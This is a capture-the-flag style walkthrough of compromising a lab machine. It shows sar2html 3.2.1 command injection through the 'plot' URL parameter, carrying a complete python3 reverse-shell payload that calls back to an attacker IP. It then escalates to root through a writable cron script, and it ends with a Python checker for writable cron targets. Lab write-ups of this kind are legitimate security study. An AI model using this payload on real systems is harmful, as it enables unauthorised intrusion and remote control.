>[!info] Open Ports
> 22 (ssh) ver. 7.6p1
> 80 (http) ver. Apache httpd 2.4.29

# Initial Web Exploration

Port 80 means an HTTP server, so the first step is to brute-force the web content:

`feroxbuster --url "http://192.168.154.35/" --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt --threads 100`

While ferox is running, we can browse the website by hand. On its face it is just the default Apache "it works" page. When feroxbuster finishes, it shows:

![[Ferox.out.png]]

The last two entries look interesting. robots.txt is a file that tells search-engine crawlers which paths they may (or may not) crawl and index, so the paths an administrator hides there are exactly the ones worth visiting.

![[robots.png]]

When we browse to the page it points at, note the version number (3.2.1); clicking around, we also see a potentially exploitable parameter in the URL:

![[sar2html.png]]

After some research, sar2html 3.2.1 turns out to be vulnerable to command injection through that parameter (Exploit-DB 47204).

# Exploitation

I used a python3 reverse shell in the URL:

`192.168.154.35/sar2HTML/index.php?plot=;python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.45.162",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'`

We get popped into a shell as www-data!

From here I started downloading some of the files in the current directory, such as the one shown below, as they seemed interesting. While I read through them I ran linpeas.sh to find me some potential privilege escalation vectors.

![[scripts.png]]

In the meantime linpeas found a cronjob that runs the finally.sh script, which is editable by www-data. I then created a simple script with a reverse shell in it, renamed it to write.sh, uploaded it to the victim and made it executable. Fast forward a couple of minutes and a root shell pops!

The machine as well as the flags are ours!
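The privilege-escalation finding above (a cron entry that runs a script the current user can edit) is the kind of thing linpeas reports; as an added example, not part of the original write-up or of linpeas, here is that check done by hand in Python 3. It parses `/etc/crontab`-style lines, including `@reboot` schedules and `cd <dir> && ./script.sh` commands whose relative path must be resolved against the `cd` target, and flags every target that is writable, or sits in a writable directory and can therefore be replaced. The crontab text in `SAMPLE_CRONTAB` is constructed for the example and is not copied from the target box; the `writable` predicate is a parameter so the logic can be exercised without touching the real filesystem.

```python
import os
import re
import shlex

# Constructed sample in /etc/crontab layout (minute hour dom month dow user command).
# Not taken from the target; the finally.sh line mirrors the pattern the write-up
# describes: a root cron entry that cds into the web root and runs a script there.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    cd /var/www/html/ && sudo ./finally.sh
@reboot         root    /usr/local/bin/startup.sh
"""

ENV_LINE = re.compile(r"^\s*[A-Za-z_][A-Za-z0-9_]*=")


def default_writable(path: str) -> bool:
    """Can the current user write to this path? (root gets True for everything.)"""
    return os.access(path, os.W_OK)


def _split_entry(line, has_user_field):
    """(schedule, user, command) for one crontab line, or None for blank lines,
    comments and VAR=value assignments."""
    if not line.strip() or line.lstrip().startswith("#") or ENV_LINE.match(line):
        return None
    n_sched = 1 if line.lstrip().startswith("@") else 5   # @reboot/@daily vs 5 fields
    n_fields = n_sched + (1 if has_user_field else 0)
    parts = line.split(None, n_fields)
    if len(parts) < n_fields + 1:
        return None                                       # malformed or truncated line
    schedule = " ".join(parts[:n_sched])
    user = parts[n_sched] if has_user_field else "<crontab owner>"
    return schedule, user, parts[-1]


def _command_paths(command):
    """Yield absolute paths named in a shell command string, resolving ./relative
    paths against the most recent 'cd <dir>' on the same line."""
    try:
        tokens = shlex.split(command)
    except ValueError:              # unbalanced quotes: fall back to a plain split
        tokens = command.split()
    cwd = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok == "cd" and i + 1 < len(tokens):
            cwd = tokens[i + 1]
            i += 2
            continue
        if tok.startswith("/"):
            yield os.path.normpath(tok)
        elif tok.startswith("./") and cwd is not None:
            yield os.path.normpath(os.path.join(cwd, tok))
        i += 1


def find_writable_cron_targets(crontab_text, writable=default_writable,
                               has_user_field=True):
    """Return [(user, schedule, path, reason)] for every path a cron entry runs
    that is writable ('file') or replaceable because its directory is ('dir')."""
    findings = []
    for line in crontab_text.splitlines():
        entry = _split_entry(line, has_user_field)
        if entry is None:
            continue
        schedule, user, command = entry
        for path in _command_paths(command):
            if writable(path):
                findings.append((user, schedule, path, "file"))
            elif writable(os.path.dirname(path)):
                findings.append((user, schedule, path, "dir"))
    return findings


if __name__ == "__main__":
    try:
        with open("/etc/crontab") as fh:      # the real thing when it is readable
            text = fh.read()
    except OSError:
        text = SAMPLE_CRONTAB                 # otherwise the constructed sample
    for user, sched, path, reason in find_writable_cron_targets(text):
        print(f"[{reason}] {sched} {user} -> {path}")
```

A `dir` finding is as good as a `file` one for escalation: an unwritable script in a writable directory can be renamed away and replaced before the next cron run. The check is deliberately one-sided (it only inspects files the cron line names), so scripts that in turn source other writable files, as the write-up's finally.sh/write.sh pair suggests, still need to be read by hand.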